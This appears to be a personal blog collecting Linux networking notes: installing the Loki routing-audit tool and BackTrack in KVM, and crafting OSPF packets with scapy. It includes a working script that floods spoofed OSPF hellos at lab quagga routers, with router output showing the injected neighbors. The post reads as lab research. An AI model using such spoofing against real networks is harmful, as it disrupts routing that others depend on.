lost and found ( for me ? )

how to install Loki 0.2.7 on Ubuntu 11.04 x86_64


In brief, Loki is a layer 3 routing auditing tool.
Here’s an explanation of how to install Loki on Ubuntu 11.04 Desktop 64bit.
# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 11.04
Release:        11.04
Codename:       natty

# uname -ri
2.6.38-16-generic x86_64


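download the pylibpcap 0.6.2-1 and Loki 0.2.7 deb packages for Ubuntu 11.04 64bit from http://c0decafe.de/loki.html. The link is plain HTTP and dpkg -i runs the packages' maintainer scripts as root, so compare the files against a checksum or signature from the author, if one is published, before installing.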
many thx :D
# ls
loki_0.2.7-1_amd64.deb  pylibpcap_0.6.2-1_amd64.deb


install pylibpcap
# dpkg -i pylibpcap_0.6.2-1_amd64.deb


install loki
# dpkg -i loki_0.2.7-1_amd64.deb
(Reading database ... 154621 files and directories currently installed.)
Preparing to replace loki 0.2.7-1 (using loki_0.2.7-1_amd64.deb) ...
Unpacking replacement loki ...
dpkg: dependency problems prevent configuration of loki:
loki depends on libdumbnet1 (>= 1.8); however:
 Package libdumbnet1 is not installed.
loki depends on python-dpkt; however:
 Package python-dpkt is not installed.
loki depends on python-dumbnet; however:
 Package python-dumbnet is not installed.
loki depends on python-ipy; however:
 Package python-ipy is not installed.
dpkg: error processing loki (--install):
dependency problems - leaving unconfigured
Errors were encountered while processing:
loki


install required packages
# apt-get install -y libdumbnet1 python-dpkt python-dumbnet python-ipy


install loki again
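Okay, this time loki installs. Note that in the apt-cache policy output below the Ubuntu archive offers a candidate 2.4.7.4-4 under the same package name, which looks like a different program, so a later apt-get upgrade would replace this install unless the package is put on hold.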
# dpkg -i loki_0.2.7-1_amd64.deb
(Reading database ... 154720 files and directories currently installed.)
Preparing to replace loki 0.2.7-1 (using loki_0.2.7-1_amd64.deb) ...
Unpacking replacement loki ...
Setting up loki (0.2.7-1) ...
Processing triggers for python-support ...

# apt-cache policy loki
loki:
 Installed: 0.2.7-1
 Candidate: 2.4.7.4-4
 Version table:
    2.4.7.4-4 0
       500 http://jp.archive.ubuntu.com/ubuntu/ natty/universe amd64 Packages
*** 0.2.7-1 0
       100 /var/lib/dpkg/status

# dpkg -L loki
/.
/usr
/usr/lib
/usr/lib/pyshared
/usr/lib/pyshared/python2.7
/usr/lib/pyshared/python2.7/loki_bindings
/usr/lib/pyshared/python2.7/loki_bindings/ospfmd5
/usr/lib/pyshared/python2.7/loki_bindings/ospfmd5/ospfmd5bf.so
/usr/lib/pyshared/python2.7/loki_bindings/mpls
/usr/lib/pyshared/python2.7/loki_bindings/mpls/mplstun.so
/usr/lib/pyshared/python2.7/loki_bindings/mpls/mplsred.so
/usr/lib/pyshared/python2.7/loki_bindings/tcpmd5
/usr/lib/pyshared/python2.7/loki_bindings/tcpmd5/tcpmd5.so
/usr/lib/pyshared/python2.7/loki_bindings/tcpmd5/tcpmd5bf.so
/usr/lib/pyshared/python2.7/loki_bindings/asleap
/usr/lib/pyshared/python2.7/loki_bindings/asleap/asleap.so
/usr/share
/usr/share/pyshared
/usr/share/pyshared/loki_bindings-0.2.egg-info
/usr/share/pyshared/loki_bindings
/usr/share/pyshared/loki_bindings/ospfmd5
/usr/share/pyshared/loki_bindings/ospfmd5/__init__.py
/usr/share/pyshared/loki_bindings/__init__.py
/usr/share/pyshared/loki_bindings/mpls
/usr/share/pyshared/loki_bindings/mpls/__init__.py
/usr/share/pyshared/loki_bindings/tcpmd5
/usr/share/pyshared/loki_bindings/tcpmd5/__init__.py
/usr/share/pyshared/loki_bindings/asleap
/usr/share/pyshared/loki_bindings/asleap/__init__.py
/usr/share/doc
/usr/share/doc/loki
/usr/share/doc/loki/README.Debian
/usr/share/doc/loki/copyright
/usr/share/doc/loki/changelog.Debian.gz
/usr/share/loki
/usr/share/loki/modules
/usr/share/loki/modules/module_ospf.py
/usr/share/loki/modules/module_dot1q.py
/usr/share/loki/modules/module_dot1q.glade
/usr/share/loki/modules/module_ldp.glade
/usr/share/loki/modules/module_bfd.glade
/usr/share/loki/modules/module_wlccp.py
/usr/share/loki/modules/module_mpls.glade
/usr/share/loki/modules/module_eigrp.glade
/usr/share/loki/modules/module_hsrp.py
/usr/share/loki/modules/module_hsrp2.py
/usr/share/loki/modules/module_hsrp.glade
/usr/share/loki/modules/module_icmp6.glade
/usr/share/loki/modules/module_wlccp.glade
/usr/share/loki/modules/module_arp.glade
/usr/share/loki/modules/module_icmp6.py
/usr/share/loki/modules/module_vrrp.glade
/usr/share/loki/modules/module_bgp.py
/usr/share/loki/modules/module_bgp.glade
/usr/share/loki/modules/module_bfd.py
/usr/share/loki/modules/module_ldp.py
/usr/share/loki/modules/module_vrrp.py
/usr/share/loki/modules/module_mpls.py
/usr/share/loki/modules/module_tcp-md5.py
/usr/share/loki/modules/module_rip.py
/usr/share/loki/modules/module_hsrp2.glade
/usr/share/loki/modules/mac.txt
/usr/share/loki/modules/module_arp.py
/usr/share/loki/modules/module_ospf.glade
/usr/share/loki/modules/module_rip.glade
/usr/share/loki/modules/module_eigrp.py
/usr/share/loki/modules/module_tcp-md5.glade
/usr/share/python-support
/usr/share/python-support/loki.public
/usr/share/python-support/loki.private
/usr/bin
/usr/bin/mpls_tunnel
/usr/bin/loki.py


start loki.py
Please note that you need to be root to run the loki.py script.
# loki.py




install BackTrack Linux 5 R3 x86_64 (BT5R3 ) within KVM

Here's an explanation of how to install BackTrack Linux 5 R3 within KVM 

KVM host info

# lsb_release -a
No LSB modules are available.
Distributor ID: LinuxMint
Description:    Linux Mint 12 Lisa
Release:        12
Codename:       lisa

# uname -ri
3.2.0-33-generic x86_64

# libvirtd --version
libvirtd (libvirt) 0.9.8

# kvm --version
QEMU emulator version 1.0 (qemu-kvm-1.0), Copyright (c) 2003-2008 Fabrice Bellard


install BT5R3 with virt-manager.
BT5R3 is Ubuntu 12.04 base.



boot BT



after booting the BT , type startx



click “Install BackTrack”



installing BT into HDD





after booting BT from the vHDD.

user : root
credential : toor




[ allow ssh access ]

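generate SSH host keys (change the default root password with passwd first; otherwise the root / toor login above may become reachable over SSH once the daemon is started)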

root@bt:~# sshd-generate


start ssh daemon
root@bt:~# /etc/init.d/ssh start


[ how to access to BT via virsh console ]

add a serial port to the BT VM, if you have not added one already

on the KVM host
virsh # dumpxml BT5

   <serial type='pty'>
     <source path='/dev/pts/16'/>
     <target port='0'/>
     <alias name='serial0'/>
   </serial>


make /etc/init/ttyS0.conf on the BT VM
root@bt:~# cat /etc/init/ttyS0.conf
start on stopped rc RUNLEVEL=[2345]
stop on runlevel [!2345]

respawn
exec /sbin/getty -L 115200 ttyS0 vt102


edit /boot/grub/menu.lst

add writable permission
root@bt:~# chmod u+w /boot/grub/grub.cfg


edit grub.cfg
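add the red lines (the color is lost in this copy; presumably the serial and terminal lines and the console=ttyS0,115200n8 kernel argument).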
serial -speed=115200 -unit=0 -word=8 -parity=no -stop=1
terminal -timeout=10 serial

menuentry 'Ubuntu, with Linux 3.2.6' --class ubuntu --class gnu-linux --class gnu --class os {
       recordfail
       insmod ext2
       set root='(hd0,1)'
       search --no-floppy --fs-uuid --set 818802dc-9073-4b13-93a8-046e382edb46
       linux   /boot/vmlinuz-3.2.6 root=UUID=818802dc-9073-4b13-93a8-046e382edb46 ro   text splash vga=791 console=ttyS0,115200n8
       initrd  /boot/initrd.img-3.2.6
}


reboot the BT

connect to the BT5 VM over virsh console
virsh # console BT5
Connected to domain BT5
Escape character is ^]

BackTrack 5 R3 - 64 Bit bt ttyS0
bt login: root
Password:
Last login: Tue Nov 27 22:40:14 JST 2012 on ttyS0

send OSPF hello packets with scapy

Here’s an explanation of how to send OSPF hello packets with scapy.
I just referred to http://blog.egofuzzer.net/2011/04/ospfs-evil-neighbor.html.
many , many thanks !


                192.168.0.0/24 ,  
area 0.0.0.0 , no authentication
quagga1 0.254  ---------vSW -------- 0.253 quagga2
                     |
                    0.30
              scapy machine ( sends OSPF hello )


I’ve already configured OSPF relationship between quagga1 and quagga2.
On the scapy box (Ubuntu 12.04), capture an OSPF hello packet with scapy to use as the template for a crafted OSPF hello packet.

sniff OSPF hello packets.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> load_contrib('ospf')

>>> sniff(filter="ip dst 224.0.0.5",count=1)
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>

>>> _[0].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 52:54:00:d4:ab:3e
 type= 0x800
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 68
    id= 56607
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x39d6
    src= 192.168.0.254 <- quagga1
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 48
       src= 192.168.1.254
       area= 0.0.0.0
       chksum= 0xf300
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.0.253
          backup= 192.168.0.254
          neighbors= ['192.168.2.254']
>>>


save above hello packet as a pcap file.
>>> wrpcap("ospf_hello.pcap",_[0])

# tshark -r ospf_hello.pcap -p ospf
Running as user "root" and group "root". This could be dangerous.
 1   0.000000 192.168.0.254 -> 224.0.0.5    OSPF 82 Hello Packet


this script will send 10 OSPF hello packets
# cat send_ospf_hello.py
#!/usr/bin/env python
from scapy.all import *

# Replays the hello captured in ospf_hello.pcap with a rewritten source.
# Each pass of the nested loops below changes the OSPF router ID to
# 192.168.<i>.<j> and transmits one frame, so a full run sends
# 200 * 99 = 19,800 hellos, all with IP source 192.168.0.30.
# Seen from a router, that is one source address announcing a new
# router ID on nearly every hello, which is a usable detection signal.
# The template was captured with authtype Null.
# NOTE(review): on a segment with OSPF authentication configured these
# frames would be expected to fail validation -- confirm on the target
# router implementation.
load_contrib('ospf')

# Only the first packet in the capture is used as the template.
pkts=rdpcap('ospf_hello.pcap')
h=pkts[0]
for i in range(0,200):
       for j in range(1,100):
               # h is modified in place, so the same packet object is reused
               # for every transmission.
               host="192.168.%s.%s" % (i,j)
               h[IP].src="192.168.0.30"
               # None makes scapy recompute the checksum when the packet is built.
               h[IP].chksum=None
               h[OSPF_Hdr].src=host
               h[OSPF_Hdr].chksum=None
               h[OSPF_Hello].router=host
               h[OSPF_Hello].backup="192.168.0.254"
               h[OSPF_Hello].neighbor="192.168.0.254"
               # No iface is passed, so sendp() uses scapy's default interface.
               sendp(h, verbose=1)


send OSPF packets
# ./send_ospf_hello.py
WARNING: No route found for IPv6 destination :: (no default route?)
.
Sent 1 packets.
<snip>


before sending crafted OSPF hello packets.
quagga1# show  ip ospf  neighbor

   Neighbor ID Pri State           Dead Time Address         Interface
  RXmtL RqstL DBsmL
192.168.2.254     1 Full/DR           35.435s 192.168.0.253   eth0:192.168.0.254
      1     0     0
quagga1#


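while sending crafted hello packets. quagga1 now lists 192.168.0.30 as an extra neighbor in Init state, and its Neighbor ID changes between the two outputs. The area in this lab uses no authentication, so nothing stops quagga1 from accepting these hellos; with OSPF authentication configured on the segment they would be expected to be discarded.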
quagga1# show  ip ospf  neighbor

   Neighbor ID Pri State           Dead Time Address         Interface
  RXmtL RqstL DBsmL
192.168.68.78     1 Init/DROther      39.997s 192.168.0.30    eth0:192.168.0.254
      0     0     0
192.168.2.254     1 Full/DR           39.250s 192.168.0.253   eth0:192.168.0.254
      0     0     0

quagga1# show  ip ospf  neighbor

   Neighbor ID Pri State           Dead Time Address         Interface
  RXmtL RqstL DBsmL
192.168.72.10     1 Init/DROther      39.998s 192.168.0.30    eth0:192.168.0.254
      0     0     0
192.168.2.254     1 Full/DR           38.442s 192.168.0.253   eth0:192.168.0.254
      0     0     0
quagga1#

# tshark -r crafted_ospf.pcap -R '(ip.addr==192.168.0.30)' | head -5
 2   1.779586 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 3   1.781786 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 4   1.783419 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 5   1.785150 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 6   1.787003 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet

python scapy : how to load extension modules with load_contrib() on Ubuntu 12.04

Here’s an explanation of how to load scapy extension modules with load_contrib().

# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.1 LTS
Release:        12.04
Codename:       precise

# uname -ri
3.2.0-33-virtual x86_64

# python --version
Python 2.7.3

# apt-cache policy python-scapy
python-scapy:
 Installed: 2.2.0-1
 Candidate: 2.2.0-1
 Version table:


after installing python-scapy with apt-get and trying to load modules with load_contrib() , I saw the following error.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)

>>> load_contrib('ospf')
ERROR: No module named contrib.ospf

>>> list_contrib()
>>>


[ how to load extension modules with load_contrib() ]

download the Python file you want to use from http://trac.secdev.org/scapy/browser/scapy/contrib/
# head -5 ospf.py
#!/usr/bin/env python
# scapy.contrib.description = OSPF
# scapy.contrib.status = loads
"""
OSPF extension for Scapy <http://www.secdev.org/scapy>


make “contrib” directory.
# mkdir /usr/lib/python2.7/dist-packages/scapy/contrib


copy ospf.py into  /usr/lib/python2.7/dist-packages/scapy/contrib/ directory.
# cp ospf.py /usr/lib/python2.7/dist-packages/scapy/contrib/

# ls /usr/lib/python2.7/dist-packages/scapy/contrib/
ospf.py


run scapy
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> list_contrib()
ospf                : OSPF                                     status=loads
>>>


load ospf. Hmm, still an error.
>>> load_contrib('ospf')
ERROR: No module named contrib.ospf


Oops, I forgot to create the __init__.py file under the /usr/lib/python2.7/dist-packages/scapy/contrib/ directory.
# touch /usr/lib/python2.7/dist-packages/scapy/contrib/__init__.py


try again.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> load_contrib('ospf')


capture OSPF packets.
>>> load_contrib('ospf')
>>> sniff(filter="ip dst 224.0.0.5",count=1)
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>
>>> _[0].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 52:54:00:d4:ab:3e
 type= 0x800
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 68
    id= 56122
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x3bbb
    src= 192.168.0.254
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 48
       src= 192.168.1.254
       area= 0.0.0.0
       chksum= 0xf300
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.0.253
          backup= 192.168.0.254
          neighbors= ['192.168.2.254']
>>>

python scapy : how to use extension modules

Here's an explanation of how to use scapy extension module , called scapy_ospf.py.

just referred to http://trac.secdev.org/scapy/wiki/OSPF
many thx xD.


# lsb_release -a
No LSB modules are available.
Distributor ID: LinuxMint
Description:    Linux Mint 12 Lisa
Release:        12
Codename:       lisa

# uname -ri
3.2.0-33-generic x86_64

# python --version
Python 2.7.3

# apt-cache policy python-scapy
python-scapy:
 Installed: 2.2.0-1
 Candidate: 2.2.0-1
 Version table:
*** 2.2.0-1 0
       500 http://archive.ubuntu.com/ubuntu/ precise/universe amd64 Packages
       100 /var/lib/dpkg/status


If you have not installed python-scapy , please install it via apt-get
# apt-get install -y python-scapy


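download an extension module, which is called scapy_ospf-v0.92.py, from http://trac.secdev.org/scapy/attachment/ticket/163/scapy_ospf-v0.92.py. It is a ticket attachment fetched over plain HTTP, so read through it before making it executable and running it as root.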
# chmod u+x scapy_ospf-v0.92.py


download ospf.cap from http://wiki.wireshark.org/SampleCaptures
# ls
ospf.cap  scapy_ospf-v0.92.py


run scapy_ospf-v0.92.py
# ./scapy_ospf-v0.92.py
Welcome to Scapy (2.2.0)
OSPF extension v0.9.2
>>>


load ospf.cap
>>> cap1=rdpcap("ospf.cap")
>>> cap1.nsummary()
0000 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0001 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0002 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0003 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0004 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0005 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0006 Ether / 192.168.170.2 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
<snip>


have a look at packet #1.
>>> cap1[1].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 00:e0:18:b1:0c:ad
 type= IPv4
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 64
    id= 2067
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x65dc
    src= 192.168.170.8
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 44
       src= 192.168.170.8
       area= 0.0.0.1
       chksum= 0x273b
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.170.8
          backup= 0.0.0.0
          neighbors= []
>>>


check OSPF header of packet #1.
>>> cap1[1][OSPF_Hdr].command()
"OSPF_Hdr(src='192.168.170.8', authtype=0, keyid=None, reserved=None, seq=None, area='0.0.0.1', authdatalen=None, authdata=0, len=44, version=2, chksum=10043, type=1)/OSPF_Hello(hellointerval=10, prio=1, mask='255.255.255.0', deadinterval=40, router='192.168.170.8', backup='0.0.0.0', options=2L)"


make OSPF packets
>>> p=IP()/OSPF_Hdr()/OSPF_LSReq(requests=[OSPF_LSReq_Item()])

>>> p.show()
###[ IP ]###
 version= 4
 ihl= None
 tos= 0x0
 len= None
 id= 1
 flags=
 frag= 0
 ttl= 64
 proto= ospf
 chksum= None
 src= 127.0.0.1
 dst= 127.0.0.1
 \options\
###[ OSPF Header ]###
    version= 2
    type= LSReq
    len= None
    src= 1.1.1.1
    area= 0.0.0.0
    chksum= None
    authtype= Null
    authdata= 0x0
###[ OSPF Link State Request (container) ]###
       \requests\
        |###[ OSPF Link State Request (item) ]###
        |  type= router
        |  id= 1.1.1.1
        |  adrouter= 1.1.1.1

>>> q=IP()/OSPF_Hdr()/OSPF_LSUpd(lsalist=[OSPF_Router_LSA(id='1.1.1.1'), OSPF_Router_LSA(id='2.2.2.2')])

>>> tshark(q)
###[ Ethernet ]###
 dst= 00:1b:54:92:fe:1f
 src= 68:b5:99:7c:94:38
 type= IPv4
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0x0
    len= 136
    id= 37346
    flags= DF
    frag= 0L
    ttl= 64
    proto= tcp
    chksum= 0x3794
    src= 172.30.68.75
    dst= 10.41.118.103
    \options\
###[ TCP ]###
       sport= ssh
       dport= 56938
       seq= 3269663846
       ack= 3358998394
       dataofs= 5L
       reserved= 0L
       flags= PA
       window= 193
       chksum= 0x7174
       urgptr= 0
       options= []
###[ Raw ]###
          load= '\xd1\xf7\xdf\xe9]\x80\xc7\xf4Go\xa66E\xc0\xc2\x96|\x9c#\xd8\xdd\xab\xc4>\x0c\xf3\xe0\xfcIx\xfa\x96\x80\xdb\xa1?P\x1d\xe9\x16\x9f(% #<\xf3\xe3\xef\x0f\xb6\x04\x99\xcfG$\x11\xb4\x86\x99\xab\x0fx\xb5\x9b\xd9=\xe4\xfb\x85H\xb5\x9cHJ\x17\xcd\x89\x8fMED\xb3]\x123ah7\xc1>\xaf\x08j\xa43'
Traceback (most recent call last):
 File "<console>", line 1, in <module>
 File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 602, in tshark
   sniff(prn=lambda x: x.display(),*args,**kargs)
 File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 591, in sniff
   if count > 0 and c >= count:
 File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 667, in __gt__
   raise TypeError((self, other))
TypeError: (<IP  proto=ospf |<OSPF_Hdr  type=LSUpd |<OSPF_LSUpd  lsalist=[<OSPF_Router_LSA  id=1.1.1.1 |>, <OSPF_Router_LSA  id=2.2.2.2 |>] |>>>, 0)
>>>


how to check what kind of methods you can use.
>>> lsc()
arpcachepoison      : Poison target's cache with (your MAC,victim's IP) couple
arping              : Send ARP who-has requests to determine which hosts are up
bind_layers         : Bind 2 layers on some specific fields' values
<snip>

>>> ls()
ARP        : ARP
ASN1_Packet : None
BOOTP      : BOOTP
CookedLinux : cooked linux
DHCP       : DHCP options
DHCP6      : DHCPv6 Generic Message)
<snip>

>>> ls(OSPF_Hdr)
version    : ByteField            = (2)
type       : ByteEnumField        = (1)
len        : ShortField           = (None)
src        : IPField              = ('1.1.1.1')
area       : IPField              = ('0.0.0.0')
chksum     : XShortField          = (None)
authtype   : ShortEnumField       = (0)
authdata   : ConditionalField     = (0)
reserved   : ConditionalField     = (0)
keyid      : ConditionalField     = (1)
authdatalen : ConditionalField     = (0)
seq        : ConditionalField     = (0)